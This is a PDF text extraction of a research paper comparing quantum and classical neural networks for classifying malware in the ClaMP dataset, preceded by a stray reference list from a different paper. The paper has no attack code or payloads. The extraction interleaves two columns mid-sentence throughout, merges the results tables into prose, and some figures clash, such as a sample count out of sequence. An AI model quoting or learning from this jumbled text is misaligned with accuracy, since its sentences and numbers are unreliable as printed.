machine learning,” in Proceedings of the Sixth “Evaluating complexity, code churn, and developer ac- ACM Conference on Data and Application Security and tivity metrics as indicators of software vulnerabilities,” Privacy, pp. 85–96, 2016. IEEE transactions on software engineering, vol. 37, no. 6, [16] P. Zeng, G. Lin, L. Pan, Y. Tai, and J. Zhang, “Software pp. 772–787, 2010. vulnerability analysis and discovery using deep learning [12] H. Perl, S. Dechand, M. Smith, D. Arp, F. Yamaguchi, techniques: A survey,” IEEE Access, vol. 8, pp. 197158– K. Rieck, S. Fahl, and Y. Acar, “Vccfinder: Finding 197172, 2020. potential vulnerabilities in open-source projects to assist [17] Y. Zhou, S. Liu, J. Siow, X. Du, and Y. Liu, “Devign: Ef-fective vulnerability identification by learning comprehen- pp. 83–102, Springer, 2023. sive program semantics via graph neural networks,” Ad- [30] Y. Wang, M. Huang, X. Zhu, and L. Zhao, “Attention- vances in neural information processing systems, vol. 32, based lstm for aspect-level sentiment classification,” in 2019. Proceedings of the 2016 conference on empirical methods [18] D. Iorga, D.-G. Corlatescu, O. Grigorescu, C. Sandescu, in natural language processing, pp. 606–615, 2016. M. Dascalu, and R. Rughinis, “Yggdrasil—early detec- [31] M. S. Akter, H. Shahriar, A. Cuzzocrea, N. Ahmed, and tion of cybernetic vulnerabilities from twitter,” in 2021 C. Leung, “Handwritten word recognition using deep 23rd International Conference on Control Systems and learning approach: A novel way of generating handwritten Computer Science (CSCS), pp. 463–468, IEEE, 2021. words,” in 2022 IEEE International Conference on Big [19] C. Sauerwein and A. Pfohl, “Towards automated clas- Data (Big Data), pp. 5414–5423, 2022. sification of attackers’ ttps by combining nlp with ml [32] H. Nguyen, K. P. Tran, S. Thomassey, and M. Hamad, techniques,” arXiv preprint arXiv:2207.08478, 2022. “Forecasting and anomaly detection approaches using [20] J. A. Harer, L. Y. Kim, R. L. Russell, O. Ozdemir, L. R. lstm and lstm autoencoder techniques with the applica- Kosta, A. Rangamani, L. H. Hamilton, G. I. Centeno, tions in supply chain management,” International Journal J. R. Key, P. M. Ellingwood, et al., “Automated software of Information Management, vol. 57, p. 102282, 2021. vulnerability detection with machine learning,” arXiv [33] K. W. Church, “Word2vec,” Natural Language Engineer- preprint arXiv:1803.04497, 2018. ing, vol. 23, no. 1, pp. 155–162, 2017.
[21] M. Pistoia, S. Chandra, S. J. Fink, and E. Yahav, “A [34] J. Devlin, M.-W. Chang, K. Lee, and K. Toutanova, “Bert: survey of static analysis methods for identifying security Pre-training of deep bidirectional transformers for lan- vulnerabilities in software systems,” IBM systems journal, guage understanding,” arXiv preprint arXiv:1810.04805, vol. 46, no. 2, pp. 265–288, 2007. 2018. [22] R. Russell, L. Kim, L. Hamilton, T. Lazovich, J. Harer, [35] R. Dale, “Gpt-3: What’s it good for?,” Natural Language O. Ozdemir, P. Ellingwood, and M. McConley, “Auto- Engineering, vol. 27, no. 1, pp. 113–118, 2021. mated vulnerability detection in source code using deep [36] D. S. Depto, S. Rahman, M. M. Hosen, M. S. Akter, representation learning,” in 2018 17th IEEE interna- T. R. Reme, A. Rahman, H. Zunair, M. S. Rahman, and tional conference on machine learning and applications M. Mahdy, “Automatic segmentation of blood cells from (ICMLA), pp. 757–762, IEEE, 2018. microscopic slides: a comparative analysis,” Tissue and [23] A. Ahmed and M. A. Yousuf, “Sentiment analysis on Cell, vol. 73, p. 101653, 2021. bangla text using long short-term memory (lstm) recur- [37] M. S. Akter, M. J. H. Faruk, N. Anjum, M. Masum, rent neural network,” in Proceedings of International H. Shahriar, N. Sakib, A. Rahman, F. Wu, and A. Cuz- Conference on Trends in Computational and Cognitive zocrea, “Software supply chain vulnerabilities detection Engineering, pp. 181–192, Springer, 2021. in source code: Performance comparison between tradi- [24] J. Pennington, R. Socher, and C. D. Manning, “Glove: tional and quantum machine learning algorithms,” in 2022 Global vectors for word representation,” in Proceedings IEEE International Conference on Big Data (Big Data), of the 2014 conference on empirical methods in natural pp. 5639–5645, IEEE, 2022. language processing (EMNLP), pp. 1532–1543, 2014. [38] M. S. Akter, H. Shahriar, S. Sneha, and A. Cuz- [25] V. Gaikwad and Y. Haribhakta, “Adaptive glove and fast- zocrea, “Multi-class skin cancer classification architecture text model for hindi word embeddings,” in Proceedings based on deep convolutional neural network,” in 2022 of the 7th ACM IKDD CoDS and 25th COMAD, pp. 175– IEEE International Conference on Big Data (Big Data), 179, 2020. pp. 5404–5413, IEEE, 2022. [26] M. S. Akter, H. Shahriar, R. Chowdhury, and M. Mahdy, [39] P. F. de la Foret, S. Ruseti, C. Sandescu, M. Dascalu, and “Forecasting the risk factor of frontier markets: A novel S. Travadel, “Interpretable identification of cybersecurity stacking ensemble of neural network approach,” Future vulnerabilities from news articles,” in Proceedings of the Internet, vol. 14, no. 9, p. 252, 2022. International Conference on Recent Advances in Natural [27] S. Hochreiter and J. Schmidhuber, “Long short-term Language Processing (RANLP 2021), pp. 428–436, 2021. memory,” Neural computation, vol. 9, no. 8, pp. 1735– [40] V. Behzadan, C. Aguirre, A. Bose, and W. Hsu, “Corpus 1780, 1997. and deep learning classifier for collection of cyber threat [28] M. S. Akter, H. Shahriar, N. Ahmed, and A. Cuzzocrea, indicators in twitter stream,” in 2018 IEEE International “Deep learning approach for classifying the aggressive Conference on Big Data (Big Data), pp. 5002–5007, comments on social media: Machine translated data vs IEEE, 2018. real life data,” in 2022 IEEE International Conference on Big Data (Big Data), pp. 5646–5655, 2022. [29] M. S. Akter, H. Shahriar, and Z. A. Bhuiya, “Automated vulnerability detection in source code using quantum natural language processing,” in Ubiquitous Security: Sec- ond International Conference, UbiSec 2022, Zhangjiajie, China, December 28–31, 2022, Revised Selected Papers,
2306.08060 Software Supply Chain Vulnerabilities Detection in Source Code: Performance Comparison between Traditional and Quantum Machine Learning Algorithms Mst Shapna Akter∗, Md Jobair Hossain Faruk∗, Nafisa Anjum†, Mohammad Masum§, Hossain Shahriar†, Akond Rahman¶, Fan Wu††, Alfredo Cuzzocrea∥ ∗Department of Computer Science, Kennesaw State University, USA †Department of Information Technology, Kennesaw State University, USA §Department of Applied Data Science, San Jose State University, USA ¶Department of Computer Science and Software Engineering, Auburn University, USA ††Department of Computer Science, Tuskegee University, USA ∥iDEA Lab, University of Calabria, Rende, Italy {makter2, mhossa21, nanjum}@students.kennesaw.edu | {hshahria}@kennesaw.edu | mohammad.masum@sjsu.edu | akond@auburn.edu | fwu@tuskegee.edu | alfredo.cuzzocrea@unical.it Abstract— The software supply chain (SSC) attack has become software security threats, Machine Learning (ML) has long been one of the crucial issues that are being increased rapidly with the adopted as a powerful approach [1], [2]. Due to the vast level of advancement of the software development domain. In general, data stores globally and being enormously increasing by 20% SSC attacks execute during the software development processes every year, finding innovative approaches to machine learning lead to vulnerabilities in software products targeting downstream is needed for proactive prevention and early detection of security customers and even involved stakeholders. Machine Learning threats [3], [4]. Quantum Machine Learning (QML) with the approaches are proven in detecting and preventing software help of quantum random access memory (QRAM) has the security vulnerabilities. Besides, emerging quantum machine learning can be promising in addressing SSC attacks. Considering potential and scores of research institutions are exploiting the the distinction between traditional and quantum machine promising QML to deal with large amounts of data [5]–[8]. In learning, performance could be varies based on the proportions of general, Quantum Machine Learning refers to an integrated field the experimenting dataset. In this paper, we conduct a of quantum computing, quantum algorithms, and classical comparative analysis between quantum neural networks (QNN) machine learning where the algorithms are developed to address and conventional neural networks (NN) with a software supply real-world problems of machine learning [32], [33], leveraging chain attack dataset known as ClaMP. Our goal is to distinguish the efficiency and concepts of quantum computing [9], [10]. the performance between QNN and NN and to conduct the experiment, we develop two different models for QNN and NN by The fundamental concepts of quantum machine learning utilizing Pennylane for quantum and TensorFlow and Keras for including quantum coherence, superposition, and entanglement traditional respectively. We evaluated the performance of both models with different proportions of the ClaMP dataset to identify provide quantum computers with immense power to process and the f1 score, recall, precision, and accuracy. We also measure the handle data in such a way that leads toward the emerging execution time to check the efficiency of both models. The implementation of quantum computing in technological fields demonstration result indicates that execution time for QNN is [11], [12]. In contrast to conventional computing, the basic unit slower than NN with a higher percentage of datasets. Due to recent of quantum computing known as Qubit, can make use of both advancements in QNN, a large level of experiments shall be the values 0 and 1 in order to follow various paths of carried out to understand both models accurately in our future computation simultaneously [13]. Mathematically, a qubit state research. is a vector in two-dimensional space, illustrated by the linear combination of the two basis states (|0⟩, and |1⟩) in a quantum Keywords— Software supply chain Security, Quantum machine learning, Quantum neural network (QNN), Neural Network (NN), system: |𝜓⟩=𝛼|0⟩+𝛽|1⟩, where 𝛼, 𝛽 ∈ ℂ are probability ClaMP, TensorFlow, Pennylane amplitudes required to satisfy |𝛼|2+|𝛽|2 = 1 [14]. Such a sequence of basis states is described as quantum superposition, I. INTRODUCTION and correlations between two qubits through a quantum phenomenon are termed entanglement. In recent years, threats to software supply chain security have evolved gradually. Analyzing threat patterns, detecting and predicting security vulnerabilities, and suspicious behaviors ofWith the ever-growing size of data, the average number of • We provide a comparative analysis of both QML, and ML's sophisticated and complicated cyberattacks and data violations performance based on the findings of the experiments using such as software supply chain attacks and network intrusion different proportions of the dataset attacks are also increasing rapidly globally. Software Supply Chain (SSC) attack occurs due to penetration of a vendor's We organize the rest of the paper as follows: In Section II, network and insertion of malicious code by a cyber threat actor we provide a brief related study on quantum machine learning that jeopardizes the software before the vendor distributes it to and traditional machine learning. Section III explains the the customers [15], [16]. SSC attacks affect the software methodology we adopted for our comparative research. The development, dissemination, and utilization phase and experimental setting and results are explained in Section IV becoming extremely critical due to excessive complications of which includes dataset specification and processing. Section V software development strategies over the years [17]. Such discusses the findings of this paper. Finally, Section VI attacks occur during the production phase causing concludes the paper. vulnerabilities to downstream consumers. SSC attacks can also
disrupt newly developed software through patches or hotfixes or II. RELATED WORK even from the outset, thus compromising the system from the start. Hence, SSC attacks can have a significant negative impact First, Addressing the constraints of traditional machine on software users in all sectors by gaining complete control over learning methods, researchers are interested in newly emerging a software's regular functionality. Hijacking updates, quantum machine learning approach for detecting and undermining code signing, and compromising open-source code preventing software and cybersecurity vulnerability [1]. Various are common techniques exclusively used by threat actors to machine learning techniques including neural network, naïve execute SSC attacks [15], [34]. bayes, logistic regression, convolutional neural network (CNN), decision tree and support vector machine are successfully In Recognition and investigation into SSC attacks, there is applied for classifying software security activities including an absence of sufficient information concerning mitigating or malware, ransomware, andnetwork intrusion detection [22]– preventing these risks. On the other hand, a network intrusion [24]. attack is an attempt to compromise the security of stored information or data on a computer connected to the network. Christopher Havenstein et al. [25] presented another Two distinct types of activities fall under this definition. First, comparative study based on the performance between Quantum an attacker can gain unauthorized access to a network, files, or Machine Learning (QML) and Classical Machine Learning information to steal sensitive data, leaving the data unharmed. (ML). The authors worked on QML algorithms with An attacker can attempt to gain unauthorized access to user reproducible code and similar code for ML. Later, quantum devices, resources, or servers to destabilize the entire network variational support vector machines were adopted that show by encrypting, deleting, mishandling, or simply modifying the higher accuracy than classical support vector machines. In data [18]. To combat such complex, unlawful and unauthorized conclusion, the researchers emphasize the potential of quantum attacks, concern grows about preventing attacks from using a multi-class SVM classifiers for the future. quantum machine learning-based paradigm [19]–[21]. Luis E. Herrera Rodr´ıguez et al. [31] presented a In the past years, none to very little research was conducted comparative study on various machine learning methods for on the software supply chain vulnerabilities dataset using dissipative quantum dynamics where the authors utilized 22 ML quantum machine learning perhaps due to the availability of models to predict long-time dynamics of quantum systems. The quantum computing resources. However, considering currently models include convolutional, and fully connected feed-forward available QML-based platforms, Pennylane for instance offers artificial neural networks (ANNs), and kernel ridge regression programming quantum computers that enable a new paradigm (KRR). termed quantum differentiable programming and provides seamless collaboration with other QML tools including IBM Mohammad Masum et al. [26] conducted research on quantum, NumPy, and TensorFlow quantum. The main quantum machine learning (QML) to detect software supply ideology of these applications is flexibility which allows it to chain attacks [1]. The researchers analyzed speed up the know how to make a distinction between various quantum performance of quantum computing by applying scores of novel devices and choose the finest algorithm for the task. This paper approaches including quantum support vector machine (QSVM) conducts a comparative analysis between quantum neural and quantum neural network (QNN). Utilizing both methods, networks (QNN) and conventional neural networks (NN) by the authors detected software supply chain attacks in open- utilizing a software supply chain attack dataset known as source quantum simulators, IBM Qiskit and TensorFlow ClaMP. The primary contribution of this research is as follows: quantum for instance. According to the research findings, quantum machine learning surpasses classical machine learning • We adopt both quantum machine learning and conventional in terms of processing speed and computational time. machine learning to conduct an experiment on a software supply chain attack dataset. MJH Faruk et al. studied quantum cybersecurity from both threats and opportunity perspectives. The authors have provideda comprehensive review of state-of-the-art quantum computing- based cybersecurity approaches. The research indicated that quantum computing can be utilized to address software security, cybersecurity, and cryptographic-related concerns. On the other hand, the malicious individual also misuses quantum computing against software infrastructure due to the immense power of quantum computers [27]. III. METHODOLOGY We adopt Quantum Neural Network (QNN), a subfield of Quantum Machine Learning (QML) for this research and applied the model to the ClaMP dataset. Figure 1 demonstrates the framework representing the implementation process. At first, we pre-processed raw data prior to providing as input to the QML model. We used Python and the shuffle function of the Scikit-Learn (sklearn) library for data preprocessing. We also used the index-reset function and drop function from the python library while labeling the encoder from sklearn library. In order to maintain a balanced number of classes and to avoid imbalanced classes that may lead to the wrong prediction, we ensure the efficiency of all of the separated portions of the dataset created from the ClaMP. For the experiment, we consider only the balanced portions of the dataset. After applying the shuffle functions, we reset the index towards organizing the dataset in ascending order. The drop function is used to remove columns that are unnecessary Figure 1: process of the architecture of the framework and does not contribute to making the prediction. In quantum machine learning models, we need to feed numerical values, so After preprocessing steps, we split the entire dataset
the categorical values were converted into numerical values, and comprising 5,210 rows into different smaller portions. We all the numerical values were normalized to maintain a similar separated the dataset into 20 smaller datasets; the number of scale. rows started from 5 percent of the total dataset and gradually increased by 5 percent up to 100 percent. The quantum machine learning model was applied to each of the dataset's separated portions. Before feeding into the QML model, the features were encoded into quantum states. We provide a comparative analysis of both QML and ML's performance based on the findings of the experiments using different proportions of the dataset. Quantum Neural Network (QNN) comes from neurocomputing theory, which converges with machine learning, quantum computing, and artificial neural network concepts [28]. QNN framework can be applied for processing neural computing utilizing vast levels of datasets to find the expected result. Before processing the data through the QNN, input data is encoded into a suitable qubit state with a proper number of qubits [29]. Later, the qubit state is modified for a specific number of layers using two gates: parameterized rotation gates and entangling gates, where the predicted value of a Hamilton operator, Pauli gates, for instance, is used to direct the altered qubit state. The results derived from Pauli gates are decoded and translated into applicable output data. A variational quantum circuits-based neural network plays various roles in QNN. Adam optimizer updates the parameters with some criteria including the size of complexity-theoretic measurements, depth, accuracy, and definite features, while the number of steps isnecessary for solving the issue of in-depth measurement. B. Data Preprocessing Precision describes the setup required to solve a number of challenges. A quantum neural network consists of three items: We applied QNN on ClaMP datasets where we utilized input, output, and L hidden layers where the L hidden layer various data sizes to inspect the experimented method's consists of a quantum circuit of the quantum perceptron, which comparative performance. We first considered the entire dataset, acts on an initial state of the input qubits and produces a mixed containing 5210 samples followed by randomly selected 5 state for the output qubits. QNN is able to do the quantum percent of the dataset without replacing any instances and computation for also the two input or one input qubit perceptron, gradually increased the percentage by 5 percent, which are 10 which goes through the quantum-circuit construction with percent, 15 percent, 20 percent, 25 percent, 30 percent, 35 quantum perceptron on 4 level qubits. The most comprehensive percent, 40 percent, 45 percent, 50 percent, 55 percent, 60 quantum perceptron implements any quantum channel on the percent, 65 percent, 70 percent, 75 percent, 80 percent, 85 input qubits. percent, 90 percent, and finally 95 percent with 260, 521, 782, 1042, 1302, 1563, 1834, 2084, 2345, 2605, 2566, 3126, 3387, The precision of p(n) is denoted by {s (n), d(n)}, where size 3647, 3908, 4168, 4429, 4689, and 4950 samples, respectively, is denoted by s(n) and depth is denoted by d(n). The number of while preserving the class proportion. We converted the qubits in the circuit is measured in size, while the longest categorical values from the feature called 'packer type' of ClaMP sequence of gates from input to output is measured in depth. The data since this type of data cannot be directly entered into the size and depth are created from gates D and U of precision p(n). model. The dataset contains a total of 108 columns, including A reversible U gate is usually followed by the D gate to one target variable. We used a standardization technique to eliminate the localization problem. The accuracy of the circuits transform all the features to a mean of zero and a standard is denoted by O{s(n)}. deviation of one. IV. EXPERIMENT & RESULTS C. Experimental Settings In this section, we present both the experiments and results. The present quantum simulator does not accept large We first provide details of dataset specification followed by dimensions as input while our dataset contains 108 dimensions, data processing. In order to explain an effective experiment, we which we cannot feed into the simulator. Hence, we adopted a define the experimental settings where we utilize accuracy, dimension reduction technique on this dataset called Principal precision, recall, and F-score metrics for evaluating models’ Component Analysis (PCA). PCA was applied to the vector of performance. Lastly, we present the experimental results. size 108 features of the CLaMP dataset for reducing the dimension. We selected the first 16 principal components, due A. Dataset Specification to the limitation of qubit numbers in the existing simulator. First, the classical NN was directly applied to the reduced dataset. The We applied Quantum Neural Network (QNN) to the ClaMP next step was encoding the classical data as quantum circuits, dataset for malware classification. ClaMP dataset has two which means converting all the features’ values into a qubit versions such as ClaMP_raw and ClaMP_Integrated. The raw value for processing in the quantum computer. instance was aggregated from VirusShare, while the benign instances were integrated from windows files. Portable executable headers contain the information which is required for OS to run executable files. Therefore, features were collected from portable executable headers for malware and benign samples. Moreover, PE header. Hence, various raw features such as File Header (7 features), DOS header (19 features), and Optional header (29 features), were extracted using ruled based method from PE headers of the samples. Figure 2: Demonstrates the quantum neural network with the input
Later, the meaningful features are derived using raw features parameter and Linear entanglement structure including entropy, compilation time, and section time. Additionally, more information about the PE file was extracted Figure 2 demonstrates the circuit created for a random by expanding a set of raw features from the file header. Finally, sample. The circuits were converted into TensorflowQuantum we selected three types of features including raw, derived, and (TFQ). Next, a model circuit layer was developed for the QNN expanded from the ClaMP_ Integrated dataset, which contains a comprising of a two-layer model with the matched size of the total of 68 features and the total number of features contains data circuit and finally wrapped the model circuit in a TFQ- several raw, expanded, and derived features which are 28, 26, Keras model. We converted the quantum data and fed it to the and 14 features, respectively [30]. model and used a parametrized quantum layer to train the model circuit on the quantum data. We adopt an optimization function known as hinge loss during the training phase. The labels wereconverted to the -1 to 1 label. Finally, we trained the QNN for Considering the experimental results, the total required 100 epochs. execution time is higher when the number of instances is smaller, on the other hand, the execution time starts to decrease D. Experimental Results: Quantum Neural Network (QNN) when the number of instances increases until a certain threshold. When the data proportion crosses the threshold, the required Our comparative analysis between the classical neural time gradually starts to increase. Table 1 shows that for 5 percent network (NN) model and the quantum neural network (QNN) and 10 percent of the total dataset, the execution times are 12min model illustrates in table 1 and Table 2 comprising twenty 24s and 11min 42s respectively. From 15 percent to 80 percent different portions of the ClaMP dataset. The results derived from dataset, except from 35 percent and 55 percent, the execution the quantum neural network model show that the accuracy is time remains 9 min 19s to 9min 48s. From 85 to 100 percent random in the different portions of the dataset. For instance, for data, the execution time increases from 10 min to 11 min. 5 percent of the dataset, the accuracy is 57 percent, the f1 score Observing quantum neural network models experiment on is 73 percent, precision is 100 percent, and recall is 57 percent, different portions of data, we found that the performance of the while for 20 percent of the dataset, the accuracy is 28 percent, model does not have an effect in terms of accuracy, but the f1 score is 28 percent, recall is 28 percent, and precision is 30 execution time varies with different proportions of the dataset. percent. Even if the dataset increases slowly the performance of the model reduces significantly in terms of accuracy. The E. Experimental Results: Traditional Neural Network (NN) accuracy suddenly jumps from 30, 35, and 40, to 45 percent and drops off 50 percent of the dataset. The results derived from the conventional neural network model also show similar results as like the quantum neural Table 1: displays a comparative analysis of the different portions of network in terms of the accuracy metric, as the accuracy is the ClaMP dataset using the quantum machine learning model such random in different portions of the dataset. Considering 5 as QNN percent of the dataset, the accuracy is 50 percent, the f1 score is 67 percent, the precision is 100 percent, and the recall is 50 Data Precision Recall F1- Accur Execution percent; for 10 percent of the dataset, the accuracy is 46 percent, percentage score acy Time the f1 score is 63 percent, the precision is 100 percent, and the 5 1.00 0.57 0.73 0.57 12min 24s recall is 46 percent; for 15 percent of the dataset, the accuracy is 10 0.42 0.35 0.37 0.35 11min 42s 45 percent, the f1 score is 70 percent, the precision is 100 15 0.68 0.55 0.58 0.55 9min 48s percent, and the recall is 54 percent, which means for the 20 0.30 0.28 0.28 0.28 9min 22s smallest portion of the dataset the accuracy is 50 percent, after 25 0.64 0.47 0.53 0.48 9min 53s 30 0.87 0.53 0.61 0.53 9min 28s increasing the data by 5 percent the accuracy drops by 4 percent, 35 0.92 0.65 0.72 0.65 10min 23s which is 46 percent, and the accuracy increases by 4 percent, 40 0.89 0.60 0.65 0.60 9min 36s which is 54 percent, after increasing the percentage by 10 45 0.83 0.72 0.74 0.73 9min 45s percent. For the large proportion of the dataset, like 80, 85, 90, 50 0.86 0.45 0.59 0.45 9min 30s and 95 percent, the accuracy values are 53, 52, 54, 54, and 53, 55 0.86 0.50 0.63 0.50 10min 35s respectively. 60 0.67 0.40 0.50 0.40 9min 20s 65 0.82 0.57 0.68 0.57 9min 45s Table 2: displays a comparative analysis of the different portions of 70 0.80 0.50 0.62 0.50 9min 19s the ClaMP dataset using the classical machine learning model such as 75 0.90 0.70 0.74 0.70 9min 42s NN 80 0.85 0.53 0.63 0.53 9min 40s 85 0.82 0.45 0.51 0.45 10min 21s N Precision Recall F1- Accuracy Execution 90 0.86 0.47 0.61 0.48 10min 7s percent score Time 95 0.87 0.55 0.67 0.55 10min 24s of total data 100 0.93 0.53 0.67 0.53 11min 21s points 5 1.00 0.50 0.67 0.50 22.1s The accuracy for 30, 35, 40, 45, and 50 percent data are 53, 10 1.00 0.46 0.63 0.46 15.2s 65, 60, 70, and 45 percent respectively. From the larger portion 15 1.00 0.54 0.70 0.54 19.8s of the data, 60, 70, 85, and 90, accuracy is incredibly low, which 20 1.00 0.48 0.65 0.48 44s
are 40, 50, 45, and 48 percent respectively, while for the data 25 1.00 0.47 0.64 0.47 26.8s proportion of 65, 75, 80, 95, and 100, accuracy is comparatively 30 1.00 0.52 0.69 0.52 41.9s high, which are 57, 70, 53, 55, and 53 percent respectively. 35 1.00 0.58 0.74 0.58 36.4s Considering all of the experiments, the findings indicate that the 40 1.00 0.49 0.66 0.49 42.3s accuracy is random on different portions of the dataset. The 45 1.00 0.48 0.65 0.48 46.3s number of instances does not affect the accuracy, while it does 50 1.00 0.54 0.70 0.54 1min 23s affect the total execution time. 55 1.00 0.53 0.70 0.53 1min 22s 60 1.00 0.51 0.68 0.51 51.1s 65 1.00 0.55 0.71 0.55 53.6s70 1.00 0.55 0.71 0.55 1min 19s the QNN, the execution time decreases with the increment 75 1.00 0.52 0.68 0.52 1min 13s portion of the dataset until a certain threshold of data proportion, 80 1.00 0.53 0.70 0.53 1min 16s for a large number of instances. For the second model, the 85 1.00 0.52 0.69 0.52 1min 22s execution time increases with the increment proportion of the 90 1.00 0.54 0.70 0.54 1min 23s dataset. Therefore, the required execution time is totally 95 1.00 0.53 0.69 0.53 1min 17s opposite of the quantum machine learning model and the 100 1.00 0.52 0.68 0.53 1min 25s classical neural network model using the software vulnerability datasets. Analyzing the experimental results, accuracy does not VI. CONCLUSION follow any pattern. Neither the accuracy decreases with the different proportion of the dataset, nor does it increase but Recently, quantum computing has become a prominent topic provides a very unpredictable and random result. Therefore, the with opportunities in the computation of machine learning model's performance does not have any impact on different algorithms that have solved complex problems. This paper proportions of the dataset in terms of the accuracy metrics. conducted a comparative study on quantum neural networks However, in terms of the total number of execution times, (QNN) and traditional neural networks (NN) and analyzes the different portions of the dataset significantly affect the neural performance of both models using software supply chain attack network model. We have observed that for smaller portions like datasets. Due to the limited availability of the quantum 5, 10, 15, 20, 25, 30, 35, 40, and 45 percent of the total dataset computer, the QML model was applied on an open-source the execution times required are 22.1s, 15.2s, 19.8s, 44s, 26.8s, Penny lane simulator. We utilized accuracy and processing 41.9s, 36.4s, 42.3s, and 46.3s respectively. For 50, 55, 70, 75, metrics for evaluating the model's performance. The 80, 85, 90, 95, 100 percent of the total dataset, the execution experimental results indicate that QNN and NN differ in times required are 1min 23s, 1min 22s, 1min 19s, 1min 13s, execution time where the QNN model provides quite higher than 1min 16s, 1min 22s, 1min 23s, 1min 17s, 1min 25s respectively. the NN model. However, the execution time for QNN slows down with the higher proportion of the dataset, while the V. DISCUSSION execution time for NN increases with the higher percentage of the dataset. Although quantum machine learning has been The Quantum machine learning model is an emerging rapidly growing over the last few decades, advancement is still approach and has yet to conduct extensive experiments required as the current version of quantum simulators comes regarding the performance of the proportion of the dataset. In with a limited number of qubits, which is not appropriate for this study, we emphasize experimenting with the quantum software supply chain attacks. A large number of qubits that machine learning model on different ratios of a dataset and converges with quantum machine learning models may play a observed how QML works with different ratios of the dataset. big role in terms of improving classification performance and Further, we conducted a comparative analysis between the reducing computation time. performance of the quantum machine learning model, and the classical machine learning model, to check how the traditional ACKNOWLEDGEMENT machine learning model works in comparison with the quantum machine learning model. The work is partially supported by the U.S. National Science Foundation Awards 2209638, 2209636, and 2209637. In accordance with the experiment, QML seems to have a Any opinions, findings, and conclusions or recommendations lower influence on various ratios of data in terms of accuracy; expressed in this material are those of the authors and do not however, the efficiency metric is applicable in that case as the necessarily reflect the views of the National Science efficiency drops with the bigger proportion of the dataset that Foundation. continues up to a certain limit. The proportion we have chosen are 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, REFERENCES 85, 90, 95, and 100. The accuracy we have found is random, and the execution time decreases from 15 percent of data to 80 [1] M. Mohammad et al., “Quantum Machine Learning for percent of data; then again, it starts to increase and continues Software Supply Chain Attacks: How Far Can We Go?,” until 100. The accuracy of the classical machine learning model 2022, [Online]. Available: https://arxiv.org/abs/2204.02784. is also random, but the efficiency starts to drop with the higher [2] A. Jain et al., “Overview and Importance of Data Quality for ratio of the dataset. Machine Learning Tasks,” Proc. ACM SIGKDD Int. Conf. Knowl. Discov. Data Min., pp. 3561–3562, 2020, doi: The accuracy, f1 score, precision, and recall results show 10.1145/3394486.3406477.
that the quantum machine learning neural network model and [3] M. Hilbert and P. López, “The world’s technological capacity the classical machine learning model does not have an impact to store, communicate, and compute information,” Science on various portions of the dataset. The results show a random (80-. )., vol. 332, no. 6025, pp. 60–65, 2011, doi: pattern throughout the entire dataset. However, we found two 10.1126/science.1200970. specific patterns of execution time results for both models. For [4] T. M. Khan and A. Robles-Kelly, “Machine Learning:Quantum vs Classical,” IEEE Access, vol. 8, pp. 219275– Xu, “A Survey on Machine Learning Techniques for Cyber 219294, 2020, doi: 10.1109/ACCESS.2020.3041719. Security in the Last Decade,” IEEE Access, vol. 8, pp. 222310–222354, 2020, doi: [5] V. Giovannetti, S. Lloyd, and L. MacCone, “Quantum 10.1109/ACCESS.2020.3041951. random access memory,” Phys. Rev. Lett., vol. 100, no. 16, 2008, doi: 10.1103/PhysRevLett.100.160501. [21] G. Apruzzese, M. Colajanni, L. Ferretti, A. Guido, and M. Marchetti, “On the effectiveness of machine and deep [6] C. Ciliberto et al., “Quantum machine learning: A classical learning for cyber security,” Int. Conf. Cyber Conflict, perspective,” Proc. R. Soc. A Math. Phys. Eng. Sci., vol. 474, CYCON, vol. 2018-May, pp. 371–389, 2018, doi: no. 2209, 2018, doi: 10.1098/rspa.2017.0551. 10.23919/CYCON.2018.8405026. [7] H. Y. Huang et al., “Power of data in quantum machine [22] M. J. Hossain Faruk et al., “Malware Detection and learning,” Nat. Commun., vol. 12, no. 1, 2021, doi: Prevention using Artificial Intelligence Techniques,” in 10.1038/s41467-021-22539-9. Proceedings - 2021 IEEE International Conference on Big [8] D. Ristè et al., “Demonstration of quantum advantage in Data, Big Data 2021, 2022, pp. 5369–5377, doi: machine learning,” npj Quantum Inf., vol. 3, no. 1, 2017, doi: 10.1109/bigdata52589.2021.9671434. 10.1038/s41534-017-0017-3. [23] M. Masum et al., “Bayesian Hyperparameter Optimization [9] A. Manzari, “Quantum Machine Learning: A Roadmap For for Deep Neural Network-Based Network Intrusion Technologists,” Quantumstrategyinstitute, 2022, [Online]. Detection,” Proc. - 2021 IEEE Int. Conf. Big Data, Big Data Available: 2021, pp. 5413–5419, 2021, doi: https://quantumstrategyinstitute.com/2022/02/28/quantum- 10.1109/BigData52589.2021.9671576. machine-learning-a-roadmap-for-technologists/. [24] M. Masum, M. J. Hossain Faruk, H. Shahriar, K. Qian, D. Lo, [10] H. Alyami et al., “The evaluation of software security through and M. I. Adnan, “Ransomware Classification and Detection quantum computing techniques: A durability perspective,” With Machine Learning Algorithms,” pp. 0316–0322, 2022, Appl. Sci., vol. 11, no. 24, 2021, doi: 10.3390/app112411784. doi: 10.1109/ccwc54503.2022.9720869. [11] L. Gyongyosi and S. Imre, “A Survey on quantum computing [25] C. Havenstein, D. Thomas, S. Chandrasekaran, C. L. technology,” Comput. Sci. Rev., vol. 31, pp. 51–71, 2019, doi: Havenstein, and D. T. Thomas, “Comparisons of 10.1016/j.cosrev.2018.11.002. Performance between Quantum and Classical Machine [12] T. D. Ladd, F. Jelezko, R. Laflamme, Y. Nakamura, C. Learning,” SMU Data Sci. Rev., vol. 1, no. 4, p. 11, 2018, Monroe, and J. L. O’Brien, “Quantum computers,” Nature, [Online]. Available: vol. 464, no. 7285, pp. 45–53, 2010, doi: https://scholar.smu.edu/datasciencereviewhttp://digitalreposi 10.1038/nature08812. tory.smu.edu.Availableat:https://scholar.smu.edu/datascienc ereview/vol1/iss4/11. [13] M. Schuld, I. Sinayskiy, and F. Petruccione, “An introduction to quantum machine learning,” Contemp. Phys., vol. 56, no. [26] Y. Wang, H. Tang, J. Huang, T. Wen, J. Ma, and J. Zhang, 2, pp. 172–185, 2015, doi: 10.1080/00107514.2014.964942. “A comparative study of different machine learning methods for reservoir landslide displacement prediction,” Eng. Geol., [14] M. A. Nielsen, I. Chuang, and L. K. Grover, “ vol. 298, 2022, doi: 10.1016/j.enggeo.2022.106544. Quantum Computation and Quantum Information ,” Am. J. Phys., vol. 70, no. 5, pp. 558–559, 2002, doi: [27] H. F. Md Jobair, T. Sharaban, T. Masrura, S. Hossain, and S. 10.1119/1.1463744. Nazmus, “A Review of Quantum Cybersecurity: Threats, Risks and Opportunities,” 2022. [15] Cybersecurity and 